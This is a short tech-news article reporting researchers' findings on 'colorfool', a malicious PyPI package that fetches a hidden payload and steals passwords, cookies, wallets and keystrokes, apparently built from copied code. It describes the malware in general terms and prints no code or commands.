Security researchers have discovered another malicious PyPI package, whose goal is to steal people’s sensitive data and allow unauthenticated users to access the compromised endpoint.
They said the package, called “colorfool”, was clearly harmful. It contained a “suspiciously large” Python file whose only job was to download another file from the Internet and run it, making sure it remained hidden from the machine’s user.
“The post immediately looked suspicious and potentially malicious,” the report stated.
To make matters worse, that wasn’t the only suspicious thing in this file. The URL from which the package needs to download the payload is hard-coded, which is another red flag.
A Python script – code.py – carries information-stealing functions, such as keylogging and cookie extraction. Besides, it was capable of stealing passwords, killing apps, taking screenshots, stealing encrypted wallet data, and even using the device’s webcam.
What makes this package different from all the other malicious PyPI packages that security researchers discover on an almost daily basis is its Frankenstein-like nature. The researchers suggest that the code was patched together from pieces of other people’s work, sometimes without regard to logic, code flow, or anything else. As if the author simply copied and pasted bits of code, often leaving redundant code to simply sit there.
> Hundreds of malicious PyPI packages wreak havoc on the Internet
> More data-stealing PyPI packages have been discovered
> Check out the best endpoint protection tools now
“The combination of the obfuscation along with the blatantly malicious code indicates that it is unlikely that all of the code was developed by a single entity,” the researchers said. “It is possible that the final developer has mostly used other people’s code, and added it by copying and pasting.”
In fact, the code holds the game “Snake” which doesn’t seem to serve any particular purpose.
For researchers, this is a great example of “democratization of cybercrime,” where threat actors can simply take code from other threat actors and incorporate it into their work.
- Here are the best firewalls today
Via: The Register